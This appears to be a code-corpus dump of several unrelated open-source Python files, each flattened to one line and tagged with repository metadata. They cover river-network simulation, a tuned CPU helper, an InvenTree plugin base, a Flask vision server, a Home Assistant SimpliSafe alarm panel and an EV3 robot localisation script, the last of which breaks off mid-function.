import numpy as np from scipy.sparse import spdiags, block_diag from scipy.sparse.linalg import spsolve, isolve from matplotlib import pyplot as plt import copy import time import ThreeChannels_generalizing reload(ThreeChannels_generalizing) r = ThreeChannels_generalizing.rnet() self = r plt.ion() # PER RIVER # ############# self.eta = [] self.nx = 1E2 + 1 ####################### ### INPUT VARIABLES ### ####################### # GLOBAL UNIFORM # ################## self.D = 200E-3 # [m] [uniform so far] porosity = lambda_p = 0.35 # [-] n_time_steps = 10 self.flow_from_to = np.array([[0,2],[1,2]]) self.flow_from = [[], [], [0,1]] self.flow_to = [[2], [2], []] self.b = [20, 20, 40] self.segment_Q_in = self.headwaters_segments = np.array([[0,40],[1,20]]) self.nsegments = len(self.flow_from) #self.flow_from_to = np.array([[0,1]]) #self.flow_from = [[], [0]] #self.flow_to = [[1], []] self.flow_from_to = np.array([[0,2],[1,2],[2,4],[3,4]]) self.flow_from = [[], [], [0,1], [], [2,3]] self.flow_to = [[2], [2], [4], [4], []] self.b = [20, 20, 40, 20, 60] #self.b = [20, 30, 50, 10, 60] self.segment_Q_in = self.headwaters_segments = np.array([[0,40],[1,20],[3,50]]) """ self.flow_from_to = np.array([[0,1]]) self.flow_from = [[], [0]] self.flow_to = [[1], []] #self.b = [20, 20, 40, 20, 60] self.b = [20, 20] """ # 3 rivers -- would often pull them in from GIS # Keep everything uniform for starters xmax = 1E3 self.B = 100 * np.ones(self.nx) S = 1E-2 self.dt = 3.15E0 self.x = [] self.dx = [] self.h = [] self.eta = [] # Multiple rivers for Si in range(len(self.flow_to)): self.x.append(np.linspace(0, xmax, self.nx)) self.dx.append(np.mean(np.diff(self.x[-1]))) # Special case of uniform grid spacing self.h.append(2. * np.ones(self.nx)) # specific case of 2 m depth everywhere #self.x[-1] += self.x[-2][-1] + self.dx[-1] #Very specific to this 3-river set here self.x[-3] += self.x[1][-1] + self.dx[-1] #Very specific to this 5-river set here self.x[-2] += self.x[1][-1] + self.dx[-1] #Very specific to this 5-river set here self.x[-1] += self.x[2][-1] + self.dx[-1] #Very specific to this 5-river set here #self.x[-1] += self.x[-2][-1] + self.dx[-1] #Very specific to this 2-river set here for row in self.x: self.eta.append( -S * row + np.max(self.x)*S ) self.eta[-1] = np.round(self.eta[-1], 6) # coarse trick to rmv floating point issues self.eta0 = copy.deepcopy(self.eta) ######################### ### DERIVED VARIABLES ### ######################### self.nts = np.linspace(0, n_time_steps, n_time_steps+1) # start at 1 below, t0 is initial self.A0 = [] for Si in range(len(self.x)): self.A0.append( 11.325 / (1 - lambda_p) * self.h[Si]/self.D ) #q_s_in = 0.69623693 # [m^3 s^{-1}] # q_s for equilibrium in each channel; used for transport slope upstream # boundary conditions #q_s_out = whatever it has to be to transport out as much material as it receives q_s_equilibrium = np.array(self.sediment__discharge_per_unit_width()) #print np.mean(eta) # Ignoring for now -- for iterating # Assuming in order: so flow_from is really irrelavant; flow_to is the important part """ fig = plt.figure() plt.ylim((0,50)) ax = plt.subplot(111) """ #for row in self.eta: # row += 10 for ts in range(10):#self.nts: # 3 iterations is usually good; nothing special about it, though. self.eta_iter = copy.deepcopy(self.eta) # For iteration self.stack_vars() for iter_i in range(20): self.build_coeff_matrix(q_s_equilibrium) self.build_RHS() #print np.max(np.hstack(self.eta_iter)) self.solve() self.update() """ ax.clear() if ts % 25 == 0: self.riverplot(linewidth=2) #plt.ylim((0,40)) #plt.draw() plt.pause(0.0001) """ self.stack_vars() #self.plot_coeff_matrix() #plt.ylim((0,40)) self.riverplot(linewidth=4, plot_start=True) plt.show()
awickert/river-network-evolution
backup/run_ThreeChannels_generalizing.py
Python
gpl-3.0
3,834
0.021127
import os import tuned.logs from . import base from tuned.utils.commands import commands log = tuned.logs.get() class cpulist_present(base.Function): """ Checks whether CPUs from list are present, returns list containing only present CPUs """ def __init__(self): # arbitrary number of arguments super(cpulist_present, self).__init__("cpulist_present", 0) def execute(self, args): if not super(cpulist_present, self).execute(args): return None cpus = self._cmd.cpulist_unpack(",,".join(args)) present = self._cmd.cpulist_unpack(self._cmd.read_file("/sys/devices/system/cpu/present")) return ",".join(str(v) for v in sorted(list(set(cpus).intersection(set(present)))))
redhat-performance/tuned
tuned/profiles/functions/function_cpulist_present.py
Python
gpl-2.0
691
0.023155
# -*- coding: utf-8 -*- """ Base Class for InvenTree plugins """ import warnings from django.db.utils import OperationalError, ProgrammingError from django.utils.text import slugify class InvenTreePluginBase(): """ Base class for a plugin DO NOT USE THIS DIRECTLY, USE plugin.IntegrationPluginBase """ def __init__(self): pass # Override the plugin name for each concrete plugin instance PLUGIN_NAME = '' PLUGIN_SLUG = None PLUGIN_TITLE = None def plugin_name(self): """ Name of plugin """ return self.PLUGIN_NAME def plugin_slug(self): """ Slug of plugin If not set plugin name slugified """ slug = getattr(self, 'PLUGIN_SLUG', None) if slug is None: slug = self.plugin_name() return slugify(slug.lower()) def plugin_title(self): """ Title of plugin """ if self.PLUGIN_TITLE: return self.PLUGIN_TITLE else: return self.plugin_name() def plugin_config(self, raise_error=False): """ Return the PluginConfig object associated with this plugin """ try: import plugin.models cfg, _ = plugin.models.PluginConfig.objects.get_or_create( key=self.plugin_slug(), name=self.plugin_name(), ) except (OperationalError, ProgrammingError) as error: cfg = None if raise_error: raise error return cfg def is_active(self): """ Return True if this plugin is currently active """ cfg = self.plugin_config() if cfg: return cfg.active else: return False # TODO @matmair remove after InvenTree 0.7.0 release class InvenTreePlugin(InvenTreePluginBase): """ This is here for leagcy reasons and will be removed in the next major release """ def __init__(self): warnings.warn("Using the InvenTreePlugin is depreceated", DeprecationWarning) super().__init__()
inventree/InvenTree
InvenTree/plugin/plugin.py
Python
mit
2,145
0.000932
from pyramda.function.curry import curry from pyramda.iterable.reduce import reduce from .multiply import multiply product = reduce(multiply, 1)
jackfirth/pyramda
pyramda/math/product.py
Python
mit
147
0
#!/usr/bin/env python import json, time from flask import Flask, request, render_template, Response from gevent import pywsgi, monkey from helpers.generateCalibration import GenerateCalibration #monkey.patch_all() app = Flask(__name__) #cameraInstance = Camera() runCalibration = GenerateCalibration('frames', 'calibration.json') class VisionServer: def __init__(self, queue): self.inQueue = queue @app.route('/') def index(): return render_template('index.html') @app.route('/hsl') def hslPage(): return render_template('hsl.html') @app.route('/calibrate') def calibratePage(): return render_template('calibrate.html') def genStream(camera): while True: yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + camera.get_frame() + b'\r\n') time.sleep(0.005) # yes, this delay is intentional. # maybe it's a hack, but hey, it works. @app.route('/stream') def stream(): return Response(genStream(cameraInstance), mimetype='multipart/x-mixed-replace; boundary=frame') @app.route('/post', methods=['POST']) def post(): if (request.form['action'] == 'changeHSL'): cameraInstance.changeHSL({'component': request.form['component'], 'min': request.form['min'], 'max': request.form['max']}) elif (request.form['action'] == 'getHSL'): return json.dumps(cameraInstance.getHSL()) elif (request.form['action'] == 'saveHSL'): return str(cameraInstance.saveHSL()) elif (request.form['action'] == 'setExposure'): return str(cameraInstance.setExposure(int(request.form['exposure']))) elif (request.form['action'] == 'on' or request.form['action'] == 'off'): if (request.form['action'] == 'on'): visionController.start() else: visionController.stop() return str(True); return str(True) @app.route('/capture') def capture(): # makes directory if it doesn't exist if not os.path.exists('frames'): os.makedirs('frames') # finds the highest int in filenames maxN = 0 if (os.listdir('frames')): files = os.listdir('frames') for file in files: this = file.split('.')[0] if (this != ''): if (int(this) > maxN): maxN = int(this) return str(cameraInstance.saveFrame('frames/' + str(maxN + 1) + '.jpg')) @app.route('/calibrate') def calibrate(): return str(runCalibration.run()) if __name__ == '__main__': gevent_server = pywsgi.WSGIServer(('', 80), app) gevent_server.serve_forever()
3299/visioninabox
server.py
Python
mit
2,744
0.027697
"""Support for SimpliSafe alarm control panels.""" import logging import re from simplipy.entity import EntityTypes from simplipy.system import SystemStates from homeassistant.components.alarm_control_panel import ( FORMAT_NUMBER, FORMAT_TEXT, AlarmControlPanel, ) from homeassistant.components.alarm_control_panel.const import ( SUPPORT_ALARM_ARM_AWAY, SUPPORT_ALARM_ARM_HOME, ) from homeassistant.const import ( CONF_CODE, STATE_ALARM_ARMED_AWAY, STATE_ALARM_ARMED_HOME, STATE_ALARM_DISARMED, ) from homeassistant.util.dt import utc_from_timestamp from . import SimpliSafeEntity from .const import DATA_CLIENT, DOMAIN _LOGGER = logging.getLogger(__name__) ATTR_ALARM_ACTIVE = "alarm_active" ATTR_BATTERY_BACKUP_POWER_LEVEL = "battery_backup_power_level" ATTR_GSM_STRENGTH = "gsm_strength" ATTR_LAST_EVENT_INFO = "last_event_info" ATTR_LAST_EVENT_SENSOR_NAME = "last_event_sensor_name" ATTR_LAST_EVENT_SENSOR_TYPE = "last_event_sensor_type" ATTR_LAST_EVENT_TIMESTAMP = "last_event_timestamp" ATTR_LAST_EVENT_TYPE = "last_event_type" ATTR_RF_JAMMING = "rf_jamming" ATTR_WALL_POWER_LEVEL = "wall_power_level" ATTR_WIFI_STRENGTH = "wifi_strength" async def async_setup_platform(hass, config, async_add_entities, discovery_info=None): """Set up a SimpliSafe alarm control panel based on existing config.""" pass async def async_setup_entry(hass, entry, async_add_entities): """Set up a SimpliSafe alarm control panel based on a config entry.""" simplisafe = hass.data[DOMAIN][DATA_CLIENT][entry.entry_id] async_add_entities( [ SimpliSafeAlarm(simplisafe, system, entry.data.get(CONF_CODE)) for system in simplisafe.systems.values() ], True, ) class SimpliSafeAlarm(SimpliSafeEntity, AlarmControlPanel): """Representation of a SimpliSafe alarm.""" def __init__(self, simplisafe, system, code): """Initialize the SimpliSafe alarm.""" super().__init__(system, "Alarm Control Panel") self._changed_by = None self._code = code self._simplisafe = simplisafe self._state = None # Some properties only exist for V2 or V3 systems: for prop in ( ATTR_BATTERY_BACKUP_POWER_LEVEL, ATTR_GSM_STRENGTH, ATTR_RF_JAMMING, ATTR_WALL_POWER_LEVEL, ATTR_WIFI_STRENGTH, ): if hasattr(system, prop): self._attrs[prop] = getattr(system, prop) @property def changed_by(self): """Return info about who changed the alarm last.""" return self._changed_by @property def code_format(self): """Return one or more digits/characters.""" if not self._code: return None if isinstance(self._code, str) and re.search("^\\d+$", self._code): return FORMAT_NUMBER return FORMAT_TEXT @property def state(self): """Return the state of the entity.""" return self._state @property def supported_features(self) -> int: """Return the list of supported features.""" return SUPPORT_ALARM_ARM_HOME | SUPPORT_ALARM_ARM_AWAY def _validate_code(self, code, state): """Validate given code.""" check = self._code is None or code == self._code if not check: _LOGGER.warning("Wrong code entered for %s", state) return check async def async_alarm_disarm(self, code=None): """Send disarm command.""" if not self._validate_code(code, "disarming"): return await self._system.set_off() async def async_alarm_arm_home(self, code=None): """Send arm home command.""" if not self._validate_code(code, "arming home"): return await self._system.set_home() async def async_alarm_arm_away(self, code=None): """Send arm away command.""" if not self._validate_code(code, "arming away"): return await self._system.set_away() async def async_update(self): """Update alarm status.""" event_data = self._simplisafe.last_event_data[self._system.system_id] if event_data.get("pinName"): self._changed_by = event_data["pinName"] if self._system.state == SystemStates.error: self._online = False return self._online = True if self._system.state == SystemStates.off: self._state = STATE_ALARM_DISARMED elif self._system.state in (SystemStates.home, SystemStates.home_count): self._state = STATE_ALARM_ARMED_HOME elif self._system.state in ( SystemStates.away, SystemStates.away_count, SystemStates.exit_delay, ): self._state = STATE_ALARM_ARMED_AWAY else: self._state = None last_event = self._simplisafe.last_event_data[self._system.system_id] self._attrs.update( { ATTR_ALARM_ACTIVE: self._system.alarm_going_off, ATTR_LAST_EVENT_INFO: last_event["info"], ATTR_LAST_EVENT_SENSOR_NAME: last_event["sensorName"], ATTR_LAST_EVENT_SENSOR_TYPE: EntityTypes(last_event["sensorType"]).name, ATTR_LAST_EVENT_TIMESTAMP: utc_from_timestamp( last_event["eventTimestamp"] ), ATTR_LAST_EVENT_TYPE: last_event["eventType"], } )
qedi-r/home-assistant
homeassistant/components/simplisafe/alarm_control_panel.py
Python
apache-2.0
5,527
0.000543
#Euclidean path planning control with Kalman filter for localization import time import cv2 from ev3control.rpc import Robot from rick.controllers import * from rick.A_star_planning import * from rick.core import State from rick.core import main_loop from rick.async import AsyncCamera from rick.utils import TrackerWrapper, bbox_center from nn_object_detection.object_detectors import NNObjectDetector from rick.live_plotting import MapRenderer from detection.marker_localization import get_marker_pose, load_camera_params import cv2.aruco as aruco from dlrc_one_shot_learning.similarity_detectors import EuclidianNNFeaturesBrickFinder, VAESimilarityDetector from rick.mc_please_github_donot_fuck_with_this_ones import A_star_path_planning_control,compute_A_star_path, A_star_control import numpy as np from math import pi from sklearn.mixture import GaussianMixture from detection.opencv import get_lego_boxes, eliminate_grip # from clustering import BBoxKMeansClustering from rick.motion_control import euclidian_kalman , kalman_filter , kalman_filter2 , robot_control, odom_estimation import sys sys.path.append("../slam/") import mapping import matplotlib.pyplot as plt from detection.opencv import detect_purple PATH_TO_CKPT = "/home/julen/dlrc_models/frozen_inference_graph.pb" PATH_TO_LABELS = "/home/dlrc/projects/DLRCev3/object_detection/nn_object_detection/tf_train_dir/data/label_map.pbtxt" print("Creating robot...") data = np.load('Homographygood.npz') H=data["arr_0"] map_renderer = MapRenderer() object_detector = NNObjectDetector(PATH_TO_CKPT, PATH_TO_LABELS) similarity_detector = VAESimilarityDetector() clustering_alg = GaussianMixture(n_components=4) NUM_CLUSTERS = 2 def acquire_target(robot, frame, **kwargs): """Callback for acquiring a lego target.""" BB_legos = get_lego_boxes(frame) # We wait until there's only one lego in view if len(BB_legos) == 1: print("found a brick") bboxes = [frame[bbox[0]:bbox[2], bbox[1]:bbox[3]] for bbox in BB_legos] robot.target = bounding_box_features = similarity_detector.extract_features(bboxes)[0] return "SEARCH_TARGET", frame, {} else: print(len(BB_legos)) return "ACQUIRE_TARGET", frame, {} def plot_mapa(mapa,robot_traj): mapa1 = np.array(mapa) rob = np.array(robot_traj) print("Before stop") if mapa1.size: print("In") plt.scatter(mapa1[:,0],mapa1[:,1]) print("Out") if rob.size > 100: plt.plot(rob[:,0],rob[:,1]) plt.axis([-100, 150, -100, 150]) plt.legend(["Lego", "path"]) plt.show() print("After stop") def search_control(state_search,mapa, pos_rob, t_old): t1 = 0 if state_search ==1: target = [0.1,0.1]# THE POINT REPRESENTS THE MIDDLE OF THE WORKSPACE vel_wheels = robot_control(pos_rob,target, K_x=1,K_y=1,K_an=1) distance = np.sqrt(np.power(pos_rob[0]-target[0],2) + np.power(pos_rob[1]-target[1],2)) if distance < 10: state_search = 2 t1 = time.time() elif state_search ==2: vel_wheels = [100,100] return vel_wheels,state_search,t1 def naive_obstacle_avoidance_control(mapa, pos_rob): max_dist = 30 min_angle = -pi/5 max_angle = pi/5 mapa_ar = np.array(mapa) vel_wheels = [160,150] for i in range(0, len(mapa)): er_x = mapa[i][0] - pos_rob[0] er_y = mapa[i][1] - pos_rob[1] distance = np.sqrt(np.power(er_x,2) + np.power(er_y,2)) er_angle = np.arctan2(er_y, er_x) - pos_rob[2]*pi/180 if er_angle >pi: er_angle = er_angle -2*pi if er_angle < -pi: er_angle = er_angle +2*pi next_x = pos_rob[0] + 10*np.cos(pos_rob[2] * pi/180) next_y = pos_rob[1] + 10*np.sin(pos_rob[2] * pi/180) if (distance< max_dist and er_angle > min_angle and er_angle< max_angle): # AVOID OBSTACLES vel_wheels = [-100,100] break elif next_x < 0 or next_x > 300 or next_y < 0 or next_y> 300: vel_wheels = [-100,100] return vel_wheels def get_lego_boxes(frame, threshold=0.9, return_closest=False): #res = object_detector.detect_with_threshold(frame,threshold=threshold, return_closest=return_closest) #BB_legos = map(lambda x: x[0], res) #return list(BB_legos) BB_legos=gl(frame) return BB_legos def index23(BB_legos,BB_target): index=1000 i=0 for box in BB_legos: if box[0]==BB_target[0][0] and box[1] == BB_target[0][1]: index = i i+=1 return index def search_target_with_Kalman_and_mapping(robot, frame , ltrack_pos=0, rtrack_pos=0, P=np.identity(3), marker_list = [], delete_countdown = 0 , mapa = [], robot_trajectory = [],R=[],state_search = 2 , t1=0, t = None,feature_map = [],iteration=0,iteration2=0): if not t: t = time.time() ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) frame = eliminate_grip(frame) BB_legos2=get_lego_boxes(frame) BB_legos=[] for bbox in BB_legos2: if bbox[3]<460 and (bbox[2]<380 or bbox[2]>420): BB_legos.append(bbox) image_name="lego_boxes" for bbox in BB_legos: image_complete_name="{}_{}{}".format(image_name,iteration,".png") iteration+=1 input_frame=frame[bbox[1]:bbox[3],bbox[0]:bbox[2],:] cv2.imwrite(image_complete_name,input_frame) #frame = plot_bbox(frame, bbox) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,delete_countdown, robot_trajectory, index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] R.append(d) box_print = [x + [0] for x in marker_map.tolist()] map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print) ############################################ print("odom :", estim_rob_pos_odom, "kalmancito" , estim_rob_pos ) #Feature extraction from bounding boxes image_name2="lego_boxes_no_duplicates" bboxes = [] for i in range(0,len(links)): bbox = BB_legos[links[i][0]] bboxes.append(frame[bbox[1]:bbox[3], bbox[0]:bbox[2],:]) image_complete_name2="{}_{}{}".format(image_name2,iteration2,".png") iteration2+=1 input_frame2=frame[bbox[1]:bbox[3],bbox[0]:bbox[2],:] cv2.imwrite(image_complete_name2,input_frame2) bounding_box_features = similarity_detector.extract_features(bboxes) for i in range(0,len(links)): feature_map[links[i][1]] = bounding_box_features[i] print("SHAPE: ", len(feature_map)) #print("FEAT" , feature_map) #DEFINE MOTION CONTROL FOR SEARCHING # THE CONTROL IS : 1. GO TO THE CENTER OF THE WORKSPACE, 2. ROUND FOR 2 secs , SELECT A POINT CLOSE TO THE CENTER as new target vel_wheels = naive_obstacle_avoidance_control(mapa, robot.position) iteration+=1 if time.time()-t > 30: clust_feats=[] for item in feature_map: if not np.all(item==0): clust_feats.append(item) clustering_alg.fit(clust_feats, n_clusters=NUM_CLUSTERS) map_renderer.plot_bricks_and_trajectory_and_robot(mapa, R, d) return "SELECT_AND_GO", frame, {"ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos,"R" : R, "mapa" : mapa} else: robot.move(vel_left=vel_wheels[1], vel_right=vel_wheels[0]) return "SEARCH_TARGET", frame, {"ltrack_pos": new_ltrack_pos, "rtrack_pos": new_rtrack_pos, "P": P , "marker_list": [], "delete_countdown" : delete_countdown , "mapa": mapa, "robot_trajectory": robot_trajectory, "R" : R, "state_search" : 2, "t1" : t1, "t" : t, "feature_map":feature_map ,"iteration":iteration,"iteration":iteration2} def select_and_go(robot,frame, cluster = 0,ltrack_pos=0, rtrack_pos=0,P = np.identity(3),R=[], mapa = [],tracker=None ,img_res=np.asarray((640, 480)), atol=10, vel_forward = 299, vel_rot = 100, atol_move_blind=140, fail_counter=0, center_position_error = 55, robot_trajectory = [], prev_BB_target = []): ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) frame = eliminate_grip(frame) BB_legos2=get_lego_boxes(frame, return_closest=True) BB_legos=[] for bbox in BB_legos2: if bbox[3]<460: BB_legos.append(bbox) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,0, robot_trajectory, index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] R.append(d) box_print = [x + [0] for x in marker_map.tolist()] map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print) ############################################ print("robot pos in blind grip: ", robot.position) if not tracker: tracker = TrackerWrapper(cv2.TrackerKCF_create) ################################## control################################ #print("BB target ", BB_target) ok, BB_target = tracker.update(frame) print("BB LEGOS", len(BB_legos)) if not ok: if len(BB_legos) >0: if len(prev_BB_target)>0: center_old = bbox_center(*prev_BB_target) sh_dist = 999999999999 for box in BB_legos: center_new = bbox_center(*box) distance = np.sqrt(np.power(center_new[0]-center_old[0],2)+ np.power(center_new[1]- center_old[1],2)) if distance < sh_dist: sh_dist = distance BB_target = box else: BB_target = BB_legos[0] tracker.init(frame, BB_target) else: robot.rotate_left(vel=100) return "SELECT_AND_GO", frame, {"cluster" : cluster, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "R" : R, "mapa" : mapa} ############ CLUSTERING RELATED ####################### bboxes = [] print("EL TARGET",BB_target) bbox = BB_target bboxes.append(frame[bbox[1]:bbox[3], bbox[0]:bbox[2],:]) bounding_box_features = similarity_detector.extract_features(bboxes) #cluster = clustering_alg.predict(bounding_box_features) cluster = [1] ######################################################### coords = bbox_center(*bbox) img_center = img_res / 2 - center_position_error #img_center[0] = 285 error = img_center - coords atol = 10 + coords[1]/480 * 40 print("Errror:", error, "Coords ", coords, " ok ", ok) frame = plot_bbox(frame,bbox, 0, (255,0,0)) if np.isclose(coords[0], img_center[0], atol=atol) and np.isclose(coords[1], img_res[1], atol=atol_move_blind): robot.move_straight(vel_forward, 500) return "MOVE_TO_BRICK_BLIND_AND_GRIP", frame, {"cluster" : cluster, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "R" : R, "mapa" : mapa} if np.isclose(coords[0], img_center[0], atol=atol): print("Move straight") robot.move_straight(vel_forward) return "SELECT_AND_GO", frame, {"prev_BB_target" : BB_target, "cluster" : cluster,"tracker" : tracker, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos,"R" : R, "mapa" : mapa} elif error[0] < 0: robot.rotate_left(vel=vel_rot) return "SELECT_AND_GO", frame, {"prev_BB_target" : BB_target, "cluster" : cluster,"tracker" : tracker, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "R" : R, "mapa" : mapa} else: # Positive velocity for turning left robot.rotate_right(vel=vel_rot) return "SELECT_AND_GO", frame, {"prev_BB_target" : BB_target, "cluster" : cluster,"tracker" : tracker, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "R" : R, "mapa" : mapa} #MOVE TO BRICK BLIND def move_to_brick_blind_and_grip(robot, frame, R=[],ltrack_pos=0 , rtrack_pos=0,marker_list=[],mapa=[], vel=400, t=1700, cluster=None): # Make sure the grip is open robot.grip.open() robot.elevator.down() robot.elevator.wait_until_not_moving() robot.move_straight(vel=vel, time=t) robot.wait_until_not_moving() robot.pick_up() #odometry update marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) P = np.identity(3) new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos print("robot pos in blind grip: ", robot.position) obj_list = [] Map = create_map(obj_list) return "GO_TO_BOX", frame, {"ltrack_pos": new_ltrack_pos, "rtrack_pos": new_rtrack_pos , "mapa": mapa, "R" : R, "cluster" : cluster, "Map" : Map} def A_star_move_to_box_blind(robot, frame, Map=[],cluster = 0, replan=1, path=[], iteration=0, ltrack_pos=0, rtrack_pos=0, TIME=0, P = np.identity(3),R=[], mapa = []): ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) # WHERE VTHE OPTICAL MARKERS ARE IN THE ENVIROMENT frame = eliminate_grip(frame) BB_legos=get_lego_boxes(frame) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,0, [], index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] R.append(d) box_print = [x + [0] for x in marker_map.tolist()] box_print[cluster][3] = 1 map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print) ############################################ print("robot_estim_pos_Astar: ", robot.position) marker_map_obj = [[110,0,0],[91,70,pi/2],[41,40,pi],[0,0,0]] marker_map_obj = np.int_(np.array(marker_map_obj)) obj = marker_map_obj[cluster[0],:2] print("THE BOX TO GO", obj, cluster) #print("DIFFERENTCE WITH THE GOAL:",abs(estim_rob_pos[0]-goal_pos[0]),abs(estim_rob_pos[1]-goal_pos[1])) #CONDITION FOR EXITTING distance_to_target = np.sqrt(np.power(estim_rob_pos[0]-marker_map_obj[cluster[0],0],2)+ np.power(estim_rob_pos[1]-marker_map_obj[cluster[0],1],2)) if distance_to_target < 20: return ("MOVE_TO_BOX_BY_VISION", frame, { "cluster": cluster,"ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "mapa":mapa}) #update map path=A_star(robot.position[0:2], obj, Map) replan=1 goal_pos=obj t0 = time.time() vel_wheels, new_path = A_star_control(robot.position,goal_pos, Map, robot.sampling_rate, odom_r= odom_r,odom_l=odom_l, iteration=iteration, path=path) robot.move(vel_left=vel_wheels[1], vel_right=vel_wheels[0]) iteration += 1 print("###########################################################################################################") print("distance to target: ", distance_to_target) print("estimated vs goal", estim_rob_pos[0:2],goal_pos) print("###########################################################################################################") return ("GO_TO_BOX", frame, {"cluster":cluster, "replan":replan,"Map":Map,"iteration" : iteration, "path" : new_path, "ltrack_pos": new_ltrack_pos, "rtrack_pos": new_rtrack_pos, "TIME": t0,"R":R, "mapa" : mapa}) def PID_control(robot, marker_map, box_coords,hist): vel_st=100 vel_rot=60 lat_tol=4 yshift=2 er_x = marker_map[0,0] - robot[0] er_y = marker_map[0,1] - robot[1] er_angle = np.arctan2(er_y, er_x) - robot[2]*pi/180 print("ANGLES WITH MARKER AND ERROR",np.arctan2(er_y, er_x)*180/pi,robot[2]) if er_angle > pi: er_angle = er_angle - 2*pi if er_angle < -pi: er_angle = er_angle + 2*pi distance = np.sqrt(np.power(er_x,2)+np.power(er_y,2)) if box_coords: print("Y_DISTANCE_TO_MARKER",box_coords[1]) if abs(box_coords[1]+yshift)>lat_tol: vel_wheels=np.asarray([-vel_rot,vel_rot])*np.sign(-box_coords[1]) print("GUIDDE BY VISION") elif box_coords[0]>35: vel_wheels=np.asarray([vel_st,vel_st]) print("GUIDDE BY VISION") else: vel_wheels=np.asarray([0,0]) hist = 0 print("STOP") else: if hist == 0: vel_wheels=np.asarray([0,0]) elif er_angle > 0.7: vel_wheels=np.asarray([vel_rot,-vel_rot]) hist = 1 elif er_angle <-0.7: vel_wheels=np.asarray([-vel_rot,vel_rot]) hist = -1 elif hist ==1 : vel_wheels=np.asarray([vel_rot,-vel_rot]) else : vel_wheels=np.asarray([-vel_rot,vel_rot]) print("CORRECTING ANGLE",er_angle) return vel_wheels, hist def move_to_box_by_vision(robot, frame, cluster =0, replan=1, path=[], iteration=0, ltrack_pos=0, rtrack_pos=0, TIME=0, P = np.identity(3), histeresis = 1,mapa=[],robot_trajectory=[]): ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) frame = eliminate_grip(frame) BB_legos=get_lego_boxes(frame) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() 